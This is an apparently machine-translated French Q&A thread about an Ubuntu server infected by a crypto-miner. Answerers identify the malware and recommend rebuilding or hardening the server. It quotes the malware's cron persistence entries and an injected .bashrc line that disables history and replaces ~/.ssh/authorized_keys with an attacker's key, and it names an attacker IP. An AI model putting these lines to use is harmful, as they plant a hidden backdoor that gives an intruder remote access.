Strange Cron Job occupe 100% du processeur Ubuntu 18 LTS Server

21

Je continue de faire apparaître des emplois cron et je n'ai aucune idée de ce qu'ils font. J'émets généralement kill -9 pour les arrêter. Ils occupent 100% de mon processeur et peuvent fonctionner pendant des jours jusqu'à ce que je vérifie. Quelqu'un sait-il ce que cela signifie?

sudo crontab -l
0 0 */3 * * /root/.firefoxcatche/a/upd>/dev/null 2>&1
@reboot /root/.firefoxcatche/a/upd>/dev/null 2>&1
5 8 * * 0 /root/.firefoxcatche/b/sync>/dev/null 2>&1
@reboot /root/.firefoxcatche/b/sync>/dev/null 2>&1
#5 1 * * * /tmp/.X13-unix/.rsync/c/aptitude>/dev/null 2>&1

J'exécute le serveur Ubuntu 18 LTS entièrement à jour depuis hier 24/07/2019

MISE À JOUR

J'apprécie tous les commentaires. J'ai déconnecté tous les lecteurs de données et d'applications car la seule chose qui a été affectée était le lecteur du système d'exploitation, j'ai au moins fait ce genre de chose correctement. Je vais avec une reconstruction complète, avec beaucoup plus de sécurité et des méthodes plus sécurisées.

server cron rsync MCP_infiltrator
la source
8
.firefoxcatchen'a probablement rien à voir avec Firefox - pourrait-il s'agir simplement d'un mineur de bitcoin? Essayez de télécharger les exécutables sur virustotal.
Thom Wiggers
1
Les fichiers gérés par ce crontab sont /root/.firefoxcatche/a/updet/root/.firefoxcatche/b/sync
Thom Wiggers
2
"Je ne trouve pas la crontab pour le hacher" qu'est-ce que cela signifie? pourquoi sudo crontab -eéditer ne fonctionnerait-il pas? Mais s'il s'agit d'un cryptominer que vous n'avez pas installé ... ceux-ci seront rajoutés. Regardez dans "/root/.firefoxcatche/a/upd" ce qu'il fait.
Rinzwind
2
"Dois-je me connecter en tant que root pour y accéder?" C'est une question que je ne m'attends pas à voir d'un administrateur. Vous devez vraiment savoir ce que vous faites à partir de maintenant. Modifiez le mot de passe administrateur dès que possible. Inspectez les fichiers répertoriés dans cron. Éradiquez-les.
Rinzwind
1
mais c'est aussi simple que cela ;-) Je gère plus de 10 instances Google Cloud. Avec un plan d'urgence sur tout ce que j'imaginais mal tourner. Si quelque chose comme cela se produisait, je détruirais l'instance racine, j'en créerais une nouvelle, scannerais le disque de données par rapport à un clone, scannerais les différences et le rattacherais à l'instance. et mettre en œuvre quelque chose pour piéger cette personne pour éviter que cela ne se reproduise. Dans mon cas, mon salaire en dépend ;-)
Rinzwind

Réponses:

40

Votre machine est très probablement infectée par un crypto-mineur. Vous pouvez voir quelqu'un d'autre signaler des noms de fichiers et des comportements similaires lors de la détection en temps réel d'une machine virtuelle dans Azure avec Security Center . Voir aussi Mon serveur Ubuntu a un virus ... Je l'ai localisé mais je ne peux pas m'en débarrasser ... sur Reddit.

Vous ne pouvez plus faire confiance à cette machine et devez la réinstaller. Soyez prudent avec la restauration des sauvegardes.

Thom Wiggers
la source
8
Je suis d'accord. le mot de passe root a été compromis, réinstallez-le et soyez très prudent avec la sauvegarde; il pourrait aussi y en avoir.
Rinzwind
9

Votre machine a été infectée par une attaque de crypto-mineur. J'ai également fait face à une attaque de ransomware similaire dans le passé et ma base de données a été compromise. J'ai pris un vidage SQL pour la machine et réapprovisionné la machine (car ma machine était une machine virtuelle hébergée sur AWS EC2). J'ai également modifié les groupes de sécurité de la machine pour verrouiller l'accès SSH et les mots de passe modifiés. J'ai également activé la journalisation pour consigner les requêtes et l'exporter vers S3 tous les soirs.

beingadityak
la source
4

La même chose m'est arrivée et je l'ai remarqué hier. J'ai vérifié le fichier /var/log/sysloget cette IP (185.234.218.40) semblait exécuter automatiquement des cronjobs.

Je l'ai vérifié sur http://whatismyipaddress.com ( https://whatismyipaddress.com/ip/185.234.218.40 ) et il contient des rapports. Ces fichiers ont été édités par le cheval de Troie:

  • .bashrc
  • .ssh / authorized_keys

J'ai trouvé ceci à la fin de .bashrc(qui est exécuté chaque fois que bash est ouvert):

set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~

Il supprime votre authorized_keysfichier, qui est une liste de clés SSH autorisées à se connecter sans mot de passe. Ensuite, il ajoute la clé SSH de l'attaquant:

ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr

De plus, j'ai trouvé ce dossier:, /tmp/.X13-unix/.rsyncoù se trouvent tous les logiciels malveillants. J'ai même trouvé un fichier, /tmp/.X13-unix/.rsync/c/ipun fichier contenant 70 000 adresses IP, qui sont probablement d'autres victimes ou serveurs de nœuds.

Il existe 2 solutions: A:

  • Ajoutez un pare-feu bloquant toutes les connexions sortantes à l'exception du port 22 et d'autres que vous jugez nécessaires et activez fail2ban, un programme qui interdit une adresse IP après l'échec de X tentatives de mot de passe

  • Tuez tous les travaux cron:, ps aux | grep cronpuis tuez le PID qui s'affiche

  • Changez votre mot de passe en un mot de passe sécurisé

B:

  • Sauvegardez tous les fichiers ou dossiers dont vous avez besoin ou que vous souhaitez

  • Réinitialisez le serveur et réinstallez Ubuntu, ou créez directement une nouvelle droplet

    Comme l'a dit Thom Wiggers, vous faites certainement partie d'un botnet de minage de bitcoins, et votre serveur a une porte dérobée . La porte dérobée utilise un exploit perl, un fichier situé ici:, /tmp/.X13-unix/.rsync/b/runcontenant ceci ( https://pastebin.com/ceP2jsUy )

Les dossiers les plus suspects que j'ai trouvés étaient:

  • /tmp/.X13-unix/.rsync

  • ~/.bashrc (qui a été édité)

  • ~/.firefoxcatche

Enfin, il y a un article relatif à la porte arrière Perl ici: https://blog.trendmicro.com/trendlabs-security-intelligence/outlaw-hacking-groups-botnet-observed-spreading-miner-perl-based-backdoor/

J'espère que vous trouvez ça utile.

Oqhax
la source
J'ai effacé le lecteur os et réinstallé Ubuntu a créé un nouveau mot de passe qui est assez long et de nouvelles clés ssh
MCP_infiltrator
Oui, c'est une bonne solution :)
Oqhax
Ce fut une réponse très utile - merci d'avoir compris le fait qui ~/.bashrcavait été édité. J'ai trouvé que pour tuer le faux, rsyncje devais émettre kill -9 <pid>.
Benny Hill